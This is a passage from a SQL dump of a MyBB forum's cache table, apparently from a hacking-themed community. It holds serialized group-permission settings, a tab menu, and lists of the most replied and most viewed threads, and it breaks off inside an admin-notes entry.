\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"797\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"798\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"799\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:75;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"814\";s:3:\"fid\";s:2:\"75\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:34;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"812\";s:3:\"fid\";s:2:\"34\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:44;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"454\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"455\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"456\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"457\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"458\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"459\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"460\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"461\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"462\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"656\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"772\";s:3:\"fid\";s:2:\"44\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:39;a:8:{i:2;a:18:{s:3:\"pid\";s:3:\"124\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"125\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"126\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"192\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"226\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"297\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"653\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"769\";s:3:\"fid\";s:2:\"39\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:40;a:3:{i:9;a:18:{s:3:\"pid\";s:3:\"122\";s:3:\"fid\";s:2:\"40\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"121\";s:3:\"fid\";s:2:\"40\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"123\";s:3:\"fid\";s:2:\"40\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('modnotes', 'a:1:{s:10:\"modmessage\";s:0:\"\";}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('tabmenu', 'a:8:{i:6;a:3:{s:5:\"tabid\";s:1:\"6\";s:7:\"tabname\";s:8:\"General \";s:7:\"tabcats\";s:3:\"1,6\";}i:5;a:3:{s:5:\"tabid\";s:1:\"5\";s:7:\"tabname\";s:7:\"Hacking\";s:7:\"tabcats\";s:2:\"10\";}i:12;a:3:{s:5:\"tabid\";s:2:\"12\";s:7:\"tabname\";s:7:\" Coding\";s:7:\"tabcats\";s:2:\"51\";}i:13;a:3:{s:5:\"tabid\";s:2:\"13\";s:7:\"tabname\";s:9:\"Computing\";s:7:\"tabcats\";s:2:\"22\";}i:24;a:3:{s:5:\"tabid\";s:2:\"24\";s:7:\"tabname\";s:6:\"Groups\";s:7:\"tabcats\";s:2:\"57\";}i:23;a:3:{s:5:\"tabid\";s:2:\"23\";s:7:\"tabname\";s:8:\"Upgraded\";s:7:\"tabcats\";s:5:\"26,31\";}i:22;a:3:{s:5:\"tabid\";s:2:\"22\";s:7:\"tabname\";s:6:\"Gaming\";s:7:\"tabcats\";s:2:\"70\";}i:25;a:3:{s:5:\"tabid\";s:2:\"25\";s:7:\"tabname\";s:8:\"Graphics\";s:7:\"tabcats\";s:2:\"32\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('most_replied_threads', 'a:15:{i:0;a:4:{s:3:\"tid\";s:3:\"190\";s:7:\"subject\";s:19:\"Copy and paste game\";s:7:\"replies\";s:3:\"103\";s:3:\"fid\";s:2:\"56\";}i:1;a:4:{s:3:\"tid\";s:3:\"238\";s:7:\"subject\";s:22:\"Ban the user above you\";s:7:\"replies\";s:2:\"89\";s:3:\"fid\";s:2:\"56\";}i:2;a:4:{s:3:\"tid\";s:3:\"197\";s:7:\"subject\";s:10:\"/me Thread\";s:7:\"replies\";s:2:\"70\";s:3:\"fid\";s:2:\"56\";}i:3;a:4:{s:3:\"tid\";s:3:\"431\";s:7:\"subject\";s:40:\"[Free] R?????zo?\'s GFX Service\";s:7:\"replies\";s:2:\"69\";s:3:\"fid\";s:2:\"61\";}i:4;a:4:{s:3:\"tid\";s:3:\"253\";s:7:\"subject\";s:12:\"Count to 200\";s:7:\"replies\";s:2:\"62\";s:3:\"fid\";s:2:\"56\";}i:5;a:4:{s:3:\"tid\";s:3:\"212\";s:7:\"subject\";s:58:\"Official New Groups Questions, Inquires, Policies and More\";s:7:\"replies\";s:2:\"60\";s:3:\"fid\";s:2:\"58\";}i:6;a:4:{s:3:\"tid\";s:3:\"747\";s:7:\"subject\";s:27:\"L33THACKING WAS NEVER SOLD!\";s:7:\"replies\";s:2:\"57\";s:3:\"fid\";s:1:\"3\";}i:7;a:4:{s:3:\"tid\";s:3:\"861\";s:7:\"subject\";s:23:\"L33T Hacking Milestones\";s:7:\"replies\";s:2:\"55\";s:3:\"fid\";s:1:\"7\";}i:8;a:4:{s:3:\"tid\";s:4:\"1091\";s:7:\"subject\";s:25:\"Rate the avatar above you\";s:7:\"replies\";s:2:\"49\";s:3:\"fid\";s:2:\"56\";}i:9;a:4:{s:3:\"tid\";s:3:\"249\";s:7:\"subject\";s:27:\"Last person to reply, wins!\";s:7:\"replies\";s:2:\"41\";s:3:\"fid\";s:2:\"56\";}i:10;a:4:{s:3:\"tid\";s:3:\"487\";s:7:\"subject\";s:14:\"Corrupt a wish\";s:7:\"replies\";s:2:\"40\";s:3:\"fid\";s:2:\"56\";}i:11;a:4:{s:3:\"tid\";s:3:\"829\";s:7:\"subject\";s:22:\"Adventure Quest Worlds\";s:7:\"replies\";s:2:\"37\";s:3:\"fid\";s:2:\"74\";}i:12;a:4:{s:3:\"tid\";s:3:\"345\";s:7:\"subject\";s:22:\"Need userbar! [Gamers]\";s:7:\"replies\";s:2:\"31\";s:3:\"fid\";s:2:\"63\";}i:13;a:4:{s:3:\"tid\";s:3:\"662\";s:7:\"subject\";s:25:\"Is this how you treat me?\";s:7:\"replies\";s:2:\"30\";s:3:\"fid\";s:1:\"7\";}i:14;a:4:{s:3:\"tid\";s:2:\"43\";s:7:\"subject\";s:20:\"How did you find us?\";s:7:\"replies\";s:2:\"29\";s:3:\"fid\";s:1:\"7\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('most_viewed_threads', 'a:15:{i:0;a:4:{s:3:\"tid\";s:4:\"1118\";s:7:\"subject\";s:48:\"? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?\";s:5:\"views\";s:3:\"646\";s:3:\"fid\";s:1:\"9\";}i:1;a:4:{s:3:\"tid\";s:3:\"190\";s:7:\"subject\";s:19:\"Copy and paste game\";s:5:\"views\";s:3:\"451\";s:3:\"fid\";s:2:\"56\";}i:2;a:4:{s:3:\"tid\";s:3:\"212\";s:7:\"subject\";s:58:\"Official New Groups Questions, Inquires, Policies and More\";s:5:\"views\";s:3:\"408\";s:3:\"fid\";s:2:\"58\";}i:3;a:4:{s:3:\"tid\";s:3:\"747\";s:7:\"subject\";s:27:\"L33THACKING WAS NEVER SOLD!\";s:5:\"views\";s:3:\"408\";s:3:\"fid\";s:1:\"3\";}i:4;a:4:{s:3:\"tid\";s:3:\"431\";s:7:\"subject\";s:40:\"[Free] R?????zo?\'s GFX Service\";s:5:\"views\";s:3:\"357\";s:3:\"fid\";s:2:\"61\";}i:5;a:4:{s:3:\"tid\";s:3:\"238\";s:7:\"subject\";s:22:\"Ban the user above you\";s:5:\"views\";s:3:\"232\";s:3:\"fid\";s:2:\"56\";}i:6;a:4:{s:3:\"tid\";s:3:\"861\";s:7:\"subject\";s:23:\"L33T Hacking Milestones\";s:5:\"views\";s:3:\"204\";s:3:\"fid\";s:1:\"7\";}i:7;a:4:{s:3:\"tid\";s:3:\"345\";s:7:\"subject\";s:22:\"Need userbar! [Gamers]\";s:5:\"views\";s:3:\"192\";s:3:\"fid\";s:2:\"63\";}i:8;a:4:{s:3:\"tid\";s:3:\"197\";s:7:\"subject\";s:10:\"/me Thread\";s:5:\"views\";s:3:\"188\";s:3:\"fid\";s:2:\"56\";}i:9;a:4:{s:3:\"tid\";s:3:\"398\";s:7:\"subject\";s:56:\"[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]\";s:5:\"views\";s:3:\"172\";s:3:\"fid\";s:2:\"21\";}i:10;a:4:{s:3:\"tid\";s:4:\"1091\";s:7:\"subject\";s:25:\"Rate the avatar above you\";s:5:\"views\";s:3:\"166\";s:3:\"fid\";s:2:\"56\";}i:11;a:4:{s:3:\"tid\";s:3:\"253\";s:7:\"subject\";s:12:\"Count to 200\";s:5:\"views\";s:3:\"157\";s:3:\"fid\";s:2:\"56\";}i:12;a:4:{s:3:\"tid\";s:1:\"2\";s:7:\"subject\";s:11:\"Userbar tut\";s:5:\"views\";s:3:\"145\";s:3:\"fid\";s:2:\"34\";}i:13;a:4:{s:3:\"tid\";s:3:\"439\";s:7:\"subject\";s:20:\"Unique - Recruitment\";s:5:\"views\";s:3:\"145\";s:3:\"fid\";s:2:\"58\";}i:14;a:4:{s:3:\"tid\";s:3:\"662\";s:7:\"subject\";s:25:\"Is this how you treat me?\";s:5:\"views\";s:3:\"139\";s:3:\"fid\";s:1:\"7\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('mailqueue', 'a:3:{s:10:\"queue_size\";s:1:\"0\";s:6:\"locked\";i:0;s:8:\"last_run\";i:1352811673;}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('adminnotes', 'a:1:{s:12:\"adminmessage\";s:1108:\"***Normal Members*** 1. Ask for their IP and check via 